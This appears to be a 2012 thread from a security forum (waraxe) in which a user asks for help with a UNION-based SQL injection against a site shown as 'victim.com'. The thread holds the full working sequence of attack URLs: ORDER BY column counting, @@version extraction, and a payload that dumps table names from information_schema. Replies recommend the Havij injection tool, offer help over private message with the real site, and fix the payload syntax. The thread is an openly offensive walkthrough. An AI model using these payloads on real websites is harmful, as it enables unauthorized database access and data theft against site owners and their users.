Waraxe IT Security Portal
Login or Register
September 5, 2026
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 1334
Members: 0
Total: 1334
Full disclosure
HP Easy Start for macOS: CVE-2026-12554 / CVE-2026-12555 /CVE-2026-12556
Next.js 16.4.0-canary.13 Image Optimizer DNS Rebinding TOCTOU SSRF Still Exists
O-CMS 1.0.0 Authenticated OS Command Injection viaai_cli_script
Flextype v1.0.0-alpha.3 CMS registerShortcodes() Remote Code Execution via Attacker-Controlled File Inclusion
Flextype v1.0.0-alpha.3 Stored Fetch Shortcode Allows Server-Side Request Forgery
Flextype v1.0.0-alpha.3 Stored Filesystem Shortcode Allows Arbitrary File Read
Flextype v1.0.0-alpha.3 Stored Expression Injection Enables PHP Remote Code Execution
Flextype v1.0.0-alpha.3 NULL access_token Authentication Bypass
Flextype v1.0.0-alpha.3 Path Traversal in Entry Copy Allows Arbitrary Directory Copy and File Disclosure
Flextype v1.0.0-alpha.3 Server-Side Request Forgery via fetch() in Query API
Flextype v1.0.0-alpha.3 Stored Arbitrary Expression Injection in ExpressionsDirective Allows Arbitrary File Read
Payara 7.2026.1.RC1 Remote Code Execution via Server-Side Includes #exec Directive in Payara Server
Payara 7.2026.1.RC1 Arbitrary EJB Method Invocation via Insecure Reflection in Payara Server
WireGuard-Linux Stack-Based Buffer Overflow in lsiio (Linux IIO Userspace Tool) Due to Unbounded fscanf
thttpd v2.26 Stack-Based Buffer Overflow in thttpd redirectCGI Program
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> Help need with my injection
Post new topicReply to topic View previous topic :: View next topic
Help need with my injection
PostPosted: Mon Aug 20, 2012 6:45 am Reply with quote
phoenixg
Regular user
Regular user
Joined: Aug 20, 2012
Posts: 6




nothing:
Code:
http://victim.com/project/articles.php?code=6&id=603 order by 15


show normal:
Code:
http://victim.com/project/articles.php?code=6&id=603 order by 14


so I tried:
Code:
http://victim.com/project/articles.php?code=6&id=-603 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14

show:
2
3

By 12
4

5

then I tried:
Code:
http://victim.com/project/articles.php?code=6&id=-603 union select 1,2,3,4,@@version,6,7,8,9,10,11,12,13,14

show:
2
3

By 12
4

5.1.61

then I tried:
Code:
http://victim.com/project/articles.php?code=6&id=-603 union select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database(),6,7,8,9,10,11,12,13,14

but nothing show, how to change the injection?
View user's profile Send private message
PostPosted: Mon Aug 20, 2012 12:50 pm Reply with quote
demon
Moderator
Moderator
Joined: Sep 22, 2010
Posts: 485




try havij Wink
View user's profile Send private message
PostPosted: Tue Aug 21, 2012 2:09 am Reply with quote
phoenixg
Regular user
Regular user
Joined: Aug 20, 2012
Posts: 6




when I download and unzip havij, Norton notice me trojan !
View user's profile Send private message
PostPosted: Mon Aug 27, 2012 12:56 am Reply with quote
phoenixg
Regular user
Regular user
Joined: Aug 20, 2012
Posts: 6




I still stuck on it, I need help
View user's profile Send private message
PostPosted: Mon Aug 27, 2012 11:10 am Reply with quote
demon
Moderator
Moderator
Joined: Sep 22, 2010
Posts: 485




send me PM with the site url Wink

_________________
Go BIG or go HOME !
View user's profile Send private message
PostPosted: Mon Aug 27, 2012 1:32 pm Reply with quote
vince213333
Advanced user
Advanced user
Joined: Aug 03, 2009
Posts: 737
Location: Belgium




Your SQL syntax is wrong:

Code:
http://victim.com/project/articles.php?code=6&id=-603 union select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database(),6,7,8,9,10,11,12,13,14


Must be:

Code:
http://victim.com/project/articles.php?code=6&id=-603 union select 1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()


because those numbers 6 to 14 are also part of the SELECT part of your query Smile
View user's profile Send private message
Help need with my injection
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



PCWizardHub - Helping you fix, build, and optimize your PC life
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.038 Seconds